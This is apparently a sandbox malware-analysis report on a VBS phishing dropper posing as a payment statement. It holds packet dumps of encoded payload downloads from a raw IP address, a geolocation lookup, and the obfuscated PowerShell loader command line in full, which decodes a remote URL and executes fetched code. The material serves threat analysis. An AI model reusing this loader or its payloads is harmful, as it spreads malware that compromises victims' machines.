                Data Raw: 63 51 47 62 63 51 47 62 75 7a 54 61 47 51 44 72 41 72 67 42 63 51 47 62 41 31 77 6b 42 4f 73 43 6a 74 31 78 41 5a 75 35 71 4e 79 74 34 4f 73 43 37 50 4a 78 41 5a 75 42 38 63 43 57 71 6d 46 78 41 5a 76 72 41 6b 59 76 67 66 46 6f 53 67 65 42 36 77 4c 2f 49 6e 45 42 6d 33 45 42 6d 2b 73 43 76 51 47 36 4e 31 69 4e 54 48 45 42 6d 2b 73 43 69 31 64 78 41 5a 76 72 41 6e 6e 35 4d 63 70 78 41 5a 74 78 41 5a 75 4a 46 41 76 72 41 6a 31 4e 36 77 4b 6e 6b 74 48 69 63 51 47 62 36 77 4a 6e 33 59 50 42 42 4f 73 43 69 41 35 78 41 5a 75 42 2b 59 78 49 58 67 52 38 79 2b 73 43 4b 63 72 72 41 6c 34 2b 69 30 51 6b 42 4f 73 43 61 35 5a 78 41 5a 75 4a 77 33 45 42 6d 2b 73 43 52 64 4f 42 77 7a 48 5a 48 41 4c 72 41 75 50 49 36 77 4b 74 71 37 71 37 6f 34 4f 67 63 51 47 62 36 77 4c 74 77 59 48 79 7a 68 4e 6c 6f 33 45 42 6d 33 45 42 6d 34 48 43 69 30 38 5a 2f 4f 73 43 70 50 46 78 41 5a 74 78 41 5a 74 78 41 5a 74 78 41 5a 76 72 41 6b 2f 59 69 77 77 51 63 51 47 62 63 51 47 62 69 51 77 54 63 51 47 62 36 77 4c 52 35 45 4c 72 41 6c [TRUNCATED]
                Data Ascii: cQGbcQGbuzTaGQDrArgBcQGbA1wkBOsCjt1xAZu5qNyt4OsC7PJxAZuB8cCWqmFxAZvrAkYvgfFoSgeB6wL/InEBm3EBm+sCvQG6N1iNTHEBm+sCi1dxAZvrAnn5McpxAZtxAZuJFAvrAj1N6wKnktHicQGb6wJn3YPBBOsCiA5xAZuB+YxIXgR8y+sCKcrrAl4+i0QkBOsCa5ZxAZuJw3EBm+sCRdOBwzHZHALrAuPI6wKtq7q7o4OgcQGb6wLtwYHyzhNlo3EBm3EBm4HCi08Z/OsCpPFxAZtxAZtxAZtxAZvrAk/YiwwQcQGbcQGbiQwTcQGb6wLR5ELrAldMcQGbgfo0KwUAddbrAl4O6wLYcIlcJAxxAZtxAZuB7QADAABxAZtxAZuLVCQIcQGb6wKpKIt8JARxAZtxAZuJ6+sC2AxxAZuBw5wAAABxAZvrAhczU3EBm+sCzmFqQOsCUs9xAZuJ63EBm+sCHpHHgwABAAAAMHsE6wLFeusCPi6BwwABAADrAqni6wKtxFPrAgsycQGbievrArh66wLKMIm7BAEAAHEBm+sCjT2BwwQBAABxAZtxAZtTcQGb6wKvsmr/cQGb6wLxCYPCBesC5BpxAZsx9nEBm3EBmzHJ6wKhvnEBm4sacQGb6wKSgkFxAZvrAl+tORwKdfNxAZvrAgzYRnEBm+sCg2CAfAr7uHXdcQGbcQGbi0QK/HEBm+sCXPcp8OsCh2DrApTB/9JxAZvrAipFujQrBQDrAjQwcQGbMcBxAZtxAZuLfCQMcQGbcQGbgTQHeFg3SOsC1i9xAZuDwARxAZtxAZs50HXlcQGbcQGbiftxAZvrAgu6/9dxAZvrAvFvQKUOkfG9tqTjrYFI+Zysus5YYsGd4S1mJXq2ufnWkdD5qaaAYOS2uWow1E4e3faPPFU3TxcnXS5BiA6A+Sw6SAObouP5LDpICGpiBfksOkh0xojEv91gSnhYDPgTwrbNL1o3SB
                Jul 5, 2024 07:13:01.116781950 CEST1236INData Raw: 4f 43 38 69 44 39 69 37 62 6c 4c 31 6f 33 53 41 57 4a 4d 6c 44 35 33 57 42 4b 65 46 6a 74 44 71 78 4d 77 59 73 63 47 63 6a 46 4c 31 6f 33 53 41 32 73 64 6f 2f 39 4e 7a 56 49 65 46 6d 74 30 52 48 5a 67 69 64 36 57 44 65 46 64 44 30 69 63 4b 44 5a
                Data Ascii: OC8iD9i7blL1o3SAWJMlD53WBKeFjtDqxMwYscGcjFL1o3SA2sdo/9NzVIeFmt0RHZgid6WDeFdD0icKDZgid6WDdspqd+zajc2cnVNzVIeChwS03YzDL8kAzFF1o3SHfdUreHp7OkHmH1cLDZSjRKQDdId9wF5nhYvs0AWTdI/IJRdRQUvtU0WTdIHt31G5B0F014YefBPRy3tQXcyaHIhDNI991TSXhYs7f4pBS/vn77hE8wa
                Jul 5, 2024 07:13:01.116795063 CEST1236INData Raw: 33 35 6d 36 48 66 63 6a 69 2b 55 7a 71 41 73 35 58 73 61 48 57 54 42 63 73 6d 79 4a 6a 57 53 79 56 41 6a 72 32 4a 6e 64 79 44 68 57 46 31 34 75 37 41 47 6a 44 75 64 76 4c 32 6e 68 5a 44 53 42 50 7a 46 53 2f 79 6a 32 5a 2f 69 5a 44 64 34 45 78 34
                Data Ascii: 35m6Hfcji+UzqAs5XsaHWTBcsmyJjWSyVAjr2JndyDhWF14u7AGjDudvL2nhZDSBPzFS/yj2Z/iZDd4Ex40bLQeFg3GsKpDvi32cX3RYr7yZIWNCp7CavBmVkm1f2KT14F3pZ/EXLx8KRYmEox41+5lQf3Tf0KwvmqaLx5rgeVvcj61wCF0VDMlj5cZK+cQj9O1g+9IT4OiSLRsjZ6WDeEBTcqp2hv9j8SqrwRrbLBIbRruOuQz
                Jul 5, 2024 07:13:01.116915941 CEST1236INData Raw: 4e 49 4b 2b 50 30 2b 5a 32 56 74 6f 74 4d 78 69 74 73 2b 5a 75 56 68 4d 52 58 74 6f 73 66 76 48 65 32 4b 63 53 2b 71 58 6c 42 71 69 37 39 69 55 56 59 65 6b 57 43 31 41 7a 76 45 76 76 2b 35 4b 45 71 59 6c 46 57 4a 59 41 4b 6f 5a 70 41 43 53 55 66
                Data Ascii: NIK+P0+Z2VtotMxits+ZuVhMRXtosfvHe2KcS+qXlBqi79iUVYekWC1AzvEvv+5KEqYlFWJYAKoZpACSUfcmhWHXESdMf+5JdyZTnuBbWFz/xFIP6CGWK2tuLSDGsh3MoT8d0fSXhYvAVk4gPhX91l8s8qpLT5sv+trEy2uhFID5/5qnlc7nu2ikAg2KQrxL6rcUuqcb4qMz8FJmya9xRDMpjo8nftzREr6381nwZk215OFjrLZ
                Jul 5, 2024 07:13:01.116929054 CEST896INData Raw: 47 4f 6d 66 6c 73 45 30 4d 59 58 6f 6c 48 76 32 6f 34 53 48 68 59 4e 30 68 34 57 44 64 49 65 46 67 33 53 48 68 59 4e 30 68 34 57 44 64 49 65 46 67 53 36 37 50 73 79 31 58 35 62 42 4f 32 69 4d 56 55 48 38 63 57 30 7a 73 50 32 63 44 65 4e 70 34 35
                Data Ascii: GOmflsE0MYXolHv2o4SHhYN0h4WDdIeFg3SHhYN0h4WDdIeFgS67Psy1X5bBO2iMVUH8cW0zsP2cDeNp45yY/rihzY2fAWMUcRwX/lSDykwQ6cl2B56kpOBZxYwCyVzH52lWnkGqKyg3lZvYVT5yLAScwn2TNseW/qu3dY7lV4WDdIeFg3SHhYN0h4WDdIeFg3SHhYN2RXR+aP4z6ZachJJIMQ+qDewNG6I3pYNxrCd8J/z9n1E
                Jul 5, 2024 07:13:01.367495060 CEST1236INData Raw: 67 33 53 48 68 59 4e 30 68 34 57 44 64 49 65 48 34 53 4e 73 6a 4d 49 2b 6b 70 30 37 71 71 65 56 67 33 48 73 59 55 42 49 37 57 32 63 45 62 59 76 43 75 79 59 36 45 2b 6d 74 57 32 66 47 6c 5a 59 32 4a 79 62 34 49 79 5a 52 66 43 61 76 42 6d 56 6b 47
                Data Ascii: g3SHhYN0h4WDdIeH4SNsjMI+kp07qqeVg3HsYUBI7W2cEbYvCuyY6E+mtW2fGlZY2Jyb4IyZRfCavBmVkG1R7d5D9xFQDqGLf1+1HodVxRvWGtFlQUtnCOnCsMMxB7QjsJvniHtjUEz/5IeFez9dhYNxH4o7cWKeGcCjBEtrlTHrI++ZmnVSPNtomIhuC3LsS+rnlWqsygJixjIPkQXwZqQnvAFix851WNzbaS0rbKMkA+TzEna
                Jul 5, 2024 07:13:01.367538929 CEST1236INData Raw: 68 59 4e 30 68 34 57 44 64 49 53 75 52 72 62 74 63 4e 68 4f 4a 46 43 74 4c 66 64 33 4c 6f 59 4c 2f 4e 6d 70 53 63 34 6f 58 4e 33 69 4f 45 79 59 36 37 66 36 6f 56 44 34 6a 2b 4d 44 2f 57 79 59 2f 6d 46 61 47 59 32 63 41 57 36 72 42 6f 79 59 2f 69
                Data Ascii: hYN0h4WDdISuRrbtcNhOJFCtLfd3LoYL/NmpSc4oXN3iOEyY67f6oVD4j+MD/WyY/mFaGY2cAW6rBoyY/iYkpI2fDMDcOmwWcvccxNNVnRx4jwTnA1gwQsbFWCFmRRYzhsAncs6HUdOI7SYUYTZTmXIpt+URrp7ScIj0YCKbVlojon9FUSzxNsXQQjgxW+cCDEh7OK1i73DJjSe4P0QCEU98xbrEj3j/d92Cnbc18Qv93pSXhYQ
                Jul 5, 2024 07:13:01.367551088 CEST448INData Raw: 68 49 32 63 44 45 32 4a 77 54 77 57 65 31 43 43 62 65 72 75 38 4b 31 4d 63 58 54 53 79 36 59 66 38 31 4e 71 65 78 30 7a 59 43 55 51 2f 69 48 69 78 79 61 4c 68 2b 78 74 30 67 4b 2b 43 51 4a 39 64 59 2f 75 4c 75 4a 39 6b 62 62 4d 75 66 31 62 6a 35
                Data Ascii: hI2cDE2JwTwWe1CCberu8K1McXTSy6Yf81Nqex0zYCUQ/iHixyaLh+xt0gK+CQJ9dY/uLuJ9kbbMuf1bj5bBOFXl+ayXx8LGM0L77NMVo3SLQvIxZwh2apt3z8trKeOCyphO59dY2c4qVU92IKRijrOQpp5LN2V45is9rwRby+sCjTsgF6WDeEuCCt7m4LuHKm8WhdVGLslg7JR6kS0K47aOstxWLRihx6WDf3/p5viPmvccdKI
                Jul 5, 2024 07:13:01.367619991 CEST1236INData Raw: 55 72 78 4c 36 72 63 57 4f 71 7a 4b 49 76 50 2b 77 39 70 66 59 76 31 5a 76 65 77 46 52 6e 64 64 41 53 30 51 73 45 48 35 36 71 62 55 50 41 37 78 6c 64 76 70 57 4c 59 67 2b 79 6d 69 4f 76 39 75 4a 6f 35 79 59 58 4c 39 4f 4b 48 48 70 59 4e 30 65 2f
                Data Ascii: UrxL6rcWOqzKIvP+w9pfYv1ZvewFRnddAS0QsEH56qbUPA7xldvpWLYg+ymiOv9uJo5yYXL9OKHHpYN0e/aY1IeFg3SHhYN0h4WDdIeFg3SHhYN0h4WAG07fjxpvjbwHJGJY/btONe2fRv4va8lJRiHnuVDLPqafAZ4BxwXSp12GvujXWQIKkMUNa//yt808LBxenhcDq7XA8IOEmJcDdIeFg3SHhYN0h4WDdIeFg3SHhYN0h4b
                Jul 5, 2024 07:13:01.367633104 CEST1236INData Raw: 46 51 38 7a 74 6f 58 50 39 39 53 46 46 53 35 4a 6a 51 48 39 4e 36 78 68 33 52 71 76 4e 35 57 44 63 65 78 6c 72 4f 73 43 7a 5a 77 52 56 42 4e 65 44 4a 6a 76 32 76 35 6a 62 5a 77 62 57 32 37 6e 6a 4a 76 71 46 64 4f 67 55 50 71 38 47 66 55 51 44 56
                Data Ascii: FQ8ztoXP99SFFS5JjQH9N6xh3RqvN5WDcexlrOsCzZwRVBNeDJjv2v5jbZwbW27njJvqFdOgUPq8GfUQDV/YpBWcHsfFco9Xx5oPksYdtfFjLZsUx9Q+aZrOt5uLROo67p5siwzJ4Htrf7x5gfJuNWt/KstrvozmeVHlfwe3hYN0h4WDdIeFg3SHhYN0h4WDdIeFg3fALhBxkIPY7FQ6KXocBmygYQmqmU+as+tW22tqOkzPiPK
                Jul 5, 2024 07:13:01.367748976 CEST1236INData Raw: 41 79 6c 4e 65 6c 53 31 6c 7a 43 2f 77 71 75 69 77 53 69 47 2f 67 70 37 62 38 6b 6d 2f 49 67 76 70 74 79 55 78 38 6c 35 31 57 36 57 44 33 76 32 53 6e 39 50 6d 76 73 59 6e 55 61 72 61 2f 37 76 32 51 58 76 6d 76 7a 50 5a 51 6d 4c 61 6e 56 4c 32 45
                Data Ascii: AylNelS1lzC/wquiwSiG/gp7b8km/IgvptyUx8l51W6WD3v2Sn9PmvsYnUara/7v2QXvmvzPZQmLanVL2EECrEvqp5YqouQYJAVzHbRfqx8A/9seTahWr0BnKkmxN3/2C5bzl5rEaoGR5lK9LQsCI+trPr8Gi3zRg2SHgOid3LHT/JvmCxPE/Z2RoeciXJlvzDdHfZ8WFa9dYY5NHXQUjFD4oKS+07Lpv4v853R3oMoFp6PuwKo


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.564544103.237.86.247805652C:\Program Files (x86)\Windows Mail\wab.exe
                TimestampBytes transferredDirectionData
                Jul 5, 2024 07:13:36.138626099 CEST173OUTGET /mtyozjDM72.bin HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                Host: 103.237.86.247
                Cache-Control: no-cache
                Jul 5, 2024 07:13:37.124567032 CEST1236INHTTP/1.1 200 OK
                Content-Type: application/octet-stream
                Last-Modified: Thu, 04 Jul 2024 09:45:36 GMT
                Accept-Ranges: bytes
                ETag: "36ed6ebf6cdda1:0"
                Server: Microsoft-IIS/8.5
                Date: Fri, 05 Jul 2024 05:13:36 GMT
                Content-Length: 494656
                Data Raw: c5 d1 00 6c a6 f7 1e 30 06 00 77 90 33 da 9c c5 82 58 ba 68 b3 a7 6d 37 c4 87 60 85 20 1d d4 a7 29 f1 4d 2e 6a 33 d9 e0 b0 fc 6a f2 e9 54 1d 8c 0d 6a c4 72 eb 7a 9d 13 3d 86 75 01 32 18 b6 2f e6 28 cc 6b 97 bf 33 a9 95 df 62 34 0d ef 0a a8 c2 26 c8 a5 41 59 05 87 46 e5 8e e1 69 73 30 66 94 57 2e 79 e1 1b 15 bd 68 4f df 1b 01 b6 7c 63 e9 29 71 63 e1 bf 6a ad eb fc 12 cd c1 53 d2 98 c3 20 13 8e 35 f5 25 9b a2 5f f8 57 bd ec bd 60 a9 08 04 28 14 d9 e8 66 6a 07 a2 ec 62 17 0a 8e 10 1d cc b0 5e 20 92 68 eb 96 cf 86 a9 fb 47 fa 1d 74 cd 10 af a5 09 9f 1d 78 2b da 9f 28 83 3c 21 c5 fb d3 29 9e e5 da 05 85 c8 50 76 18 be 54 07 b5 6c e7 43 dd 4a 93 c4 0d ee 37 14 c4 2b 88 b8 32 c7 88 9c 3a 8d 91 8b 46 81 c7 13 5b 4c eb d7 73 46 e0 67 e7 54 4b 4b d4 87 69 32 8d a3 e9 ed 37 6b 35 5c 1c ba 49 fa e4 58 c2 f0 50 68 cf f4 aa 7c d4 cb f9 27 86 38 51 b9 c7 59 38 f0 67 48 d3 45 4f 58 5e 73 ed cb 32 4d 37 a7 62 e5 1c 95 7c 20 6d 64 34 c5 58 f2 1c cd b5 29 c9 d5 ee b0 d2 81 61 1b 6f 84 9a f2 f1 09 2f 3a 08 d3 a0 55 0a [TRUNCATED]
                Data Ascii: l0w3Xhm7` )M.j3jTjrz=u2/(k3b4&AYFis0fW.yhO|c)qcjS 5%_W`(fjb^ hGtx+(<!)PvTlCJ7+2:F[LsFgTKKi27k5\IXPh|'8QY8gHEOX^s2M7b| md4X)ao/:U*LHBwu4JR-K4v$*H,lJofyRp?:Vk>+dQ-^}V-JnehI8iMP$<vO*5knMdKmsSwW?;iI?@oe1H,wDL(i9@'uE3%HrKBS!cG7r-;Eh5)6?AAh&p;R7*1Ew^vF*23TI171ls,&0v#Y5fvq&,?kMMY>{tp!w\tCx|`^/x+-7Jz?6/bz4"??n-0_4 G iifv|`AM`q.v?PcR;En&yAAoBE1>=8"`8*"9V~km2AJtSgm`zo]JFAQ)'RkF=^?%
                Jul 5, 2024 07:13:37.124718904 CEST1236INData Raw: 74 e5 a6 d8 22 56 2f 7d ab bb 5e e9 36 fd 4d e6 2d 10 70 d6 8d b5 9e f0 ff 9f 88 3d db b3 32 29 1d 6c bf d3 b3 b3 40 e4 ac 95 24 65 a7 d9 6c 51 a5 44 c8 c4 10 a3 ad 96 38 89 2c c9 51 5f bc 6f 8e eb 49 25 76 1b ce 8a 24 db 93 34 40 96 f4 8a e7 40
                Data Ascii: t"V/}^6M-p=2)l@$elQD8,Q_oI%v$4@@#]Bxi5LM:~5hJH<S,Y~^S65'U)W7mef^@$n"ZO|x'LS94SS'32.?
                Jul 5, 2024 07:13:37.124732971 CEST1236INData Raw: 72 8b c5 79 dd 14 f4 08 69 03 cf c7 7a a0 c6 b1 21 1c 89 26 30 4e 91 c9 47 02 dd 1e 93 8c 66 cb 97 cc d5 cd a6 04 59 42 fb fc d1 ea 13 e2 f5 c6 70 06 18 13 8d ab f5 43 5f 84 4c f2 cd f9 f1 f8 be 01 e3 c7 47 42 c0 d2 da f7 6e b9 42 8d ae 65 be a1
                Data Ascii: ryiz!&0NGfYBpC_LGBnBe :/xChmcy.PtWTCI{Jrhzn.E-P4%ehi8$[n?]||M6&:Mng&Invyx#b@25cf
                Jul 5, 2024 07:13:37.124926090 CEST1236INData Raw: a4 ff 18 e4 1b eb 6d 72 98 30 62 82 9e e2 12 2d 97 9b f6 2d f9 8a 5d 61 33 00 78 16 c7 81 61 42 e4 54 17 be d5 6d c7 11 1d d3 a0 5c c4 d2 41 2a c6 03 a0 47 59 d7 92 1b fc 47 f8 78 6e 7e 4f 4f d7 15 fe b7 b7 c8 ee 21 52 9b 6d 2c 1d 4a a1 20 c9 62
                Data Ascii: mr0b--]a3xaBTm\A*GYGxn~OO!Rm,J be- f%5(5<VO'[QzVV%~5IflI5T('iM<uvO ?^,n&g1E*J<LiOyw^V}/'TFK5y4$hbRF'
                Jul 5, 2024 07:13:37.125077009 CEST896INData Raw: 53 2f 70 e1 ad 75 08 d2 64 11 ee b2 97 98 42 86 40 0c b0 2f 52 f6 86 b9 eb 30 8e 64 ce 31 79 c6 58 da 78 52 93 4e 58 cf 33 6a ce bd be b8 88 70 bb 06 21 dd 8f cb 48 e9 57 d9 77 64 d4 48 55 44 79 49 f2 80 38 4e 0a ee 19 5d 28 3a f4 fc 15 b2 89 aa
                Data Ascii: S/pudB@/R0d1yXxRNX3jp!HWwdHUDyI8N](:[[,eb5woj-f-3bQ]Yd?w\:d /lW#TAYToDD2yUM)q:jqNbQ1"F2pVS'fdW~tmOti9
                Jul 5, 2024 07:13:37.377682924 CEST1236INData Raw: 64 62 9a a8 63 82 ea e3 a5 0c f9 2d 68 c6 12 b4 b5 90 c0 6e 14 21 99 f2 40 3d 68 93 03 6c b7 f9 92 47 05 70 82 e8 f0 c6 fe aa 44 41 ae e4 2f cb 56 31 5c 9c 3e 89 35 c5 3a 50 c0 0a 3a c2 28 fa cb 22 20 a6 92 3e 6c d3 09 fd 5b b7 e2 6e 35 33 e6 1a
                Data Ascii: dbc-hn!@=hlGpDA/V1\>5:P:(" >l[n53^/Ot"m?Y @M6I"TN*-Lel0Z?f^{tw'x!m2kPBF{N</,M6; ,!YSc0{<N
                Jul 5, 2024 07:13:37.377696991 CEST1236INData Raw: 43 3d 86 b4 81 80 1c 68 f1 3f 45 69 35 6f 10 cb 4c 03 da 91 d5 56 d4 f9 ee d9 94 87 af ec d5 14 04 eb 19 b1 bf b3 d7 9b a6 13 eb b4 8f 1c 86 5c 19 f2 c6 be 43 af 5e 32 da 31 18 6c 01 68 b4 1f c1 97 9a cf dd 77 ca cd 2b 8d 05 dd b0 cc a4 35 3a 46
                Data Ascii: C=h?Ei5oLV\C^21lhw+5:FN[5pI#z4~<u>zvF@OwR#8bni6,"/&v<I.(p?vHE&9{-AxD4\ph[t-,wy?3
                Jul 5, 2024 07:13:37.377707005 CEST448INData Raw: 81 6c 0a 98 15 31 e9 85 86 7a 74 d3 a9 5e 35 e2 f4 95 09 47 eb 9c 66 e1 64 b4 eb 39 fd 1f 1b f9 20 c7 28 c3 1d 3f 51 d2 f9 5e a1 b3 c4 54 06 d5 69 f3 66 32 77 bb 75 c3 d2 d5 88 16 df 66 30 a4 c4 3a f1 e9 7b 1e 6a 2a fb d3 f0 0e 33 67 9f 2e bb 26
                Data Ascii: l1zt^5Gfd9 (?Q^Tif2wuf0:{j*3g.&4pC}1\kE[vojy[1pFhFD6a9lUB<j!UT=Q%'Pl0b1&%doOYpdSXEX!IB?zqh^J8%<q+]1bH&
                Jul 5, 2024 07:13:37.377796888 CEST1236INData Raw: 51 01 35 b4 1e ad 83 51 c1 68 fd 2f d5 fa 6b 4e 4a 2b 06 f4 41 6c d9 ff 60 f5 15 2a 31 9c b4 a9 93 80 8b a1 3a 4e cf 2f 33 cb 81 b0 66 17 cb 63 44 52 c9 14 94 16 01 d9 df 84 99 8c 0c 45 0d 79 25 27 f7 08 b9 85 9a 68 66 1b c7 59 75 10 31 7d 75 2b
                Data Ascii: Q5Qh/kNJ+Al`*1:N/3fcDREy%'hfYu1}u+OZ%|$TbC7\%Y9&7QKz,Ylz+%Z7Sg2f<^!K7r[1n\-@v4(G=kMdYLmf<LvhuVeRY
                Jul 5, 2024 07:13:37.377810001 CEST1236INData Raw: c5 d0 b9 0a 2c dc 9d 51 a4 19 92 c5 83 80 35 ae 20 dc 53 9c fc b8 c7 e0 9d 4a b5 d1 b6 e2 7a 17 a8 00 bc 9a aa ed 3a 7b c0 92 ab 9a 03 79 3e 2e 20 88 e4 ee d3 25 73 48 1d 99 cf 00 80 b6 c2 dc 51 65 49 ee 5a 38 62 3c 27 83 36 25 45 e1 ce d1 96 51
                Data Ascii: ,Q5 SJz:{y>. %sHQeIZ8b<'6%EQ"8c+:b,vjLLBQ0 SO,EK| BeI.F4"PV:GY-VA6;} 0nIFn+}@y@4;nC9N&S'3"kriu}
                Jul 5, 2024 07:13:37.377902031 CEST1236INData Raw: 9b d4 65 42 0f 3c ef d4 20 d7 82 5d a8 3c 64 cf 84 ea a1 bc 8a 39 4f 1f a4 a2 c9 72 6d 16 32 d1 de d9 dc 04 fd a3 6e 50 db e3 f6 3b aa 74 6f d2 6d 1c e4 af f3 b4 dc e0 78 e0 ba 07 44 ec 40 34 15 f1 6b 2a 61 dd a2 a5 43 6c 3a 80 ec f3 ec 30 b6 3c
                Data Ascii: eB< ]<d9Orm2nP;tomxD@4k*aCl:0<r#R|0w|"::Z('a]$.e&S'9N]mVkzL'M1t/ErCdqr\k4_7WRPoDq|IHEd8q1!i


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.564547178.237.33.50805652C:\Program Files (x86)\Windows Mail\wab.exe
                TimestampBytes transferredDirectionData
                Jul 5, 2024 07:13:44.517435074 CEST71OUTGET /json.gp HTTP/1.1
                Host: geoplugin.net
                Cache-Control: no-cache
                Jul 5, 2024 07:13:45.140240908 CEST1170INHTTP/1.1 200 OK
                date: Fri, 05 Jul 2024 05:13:45 GMT
                server: Apache
                content-length: 962
                content-type: application/json; charset=utf-8
                cache-control: public, max-age=300
                access-control-allow-origin: *
                Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:01:12:56
                Start date:05/07/2024
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT - STATEMENT ADVISE.vbs"
                Imagebase:0x7ff6d36e0000
                File size:170'496 bytes
                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:2
                Start time:01:12:57
                Start date:05/07/2024
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 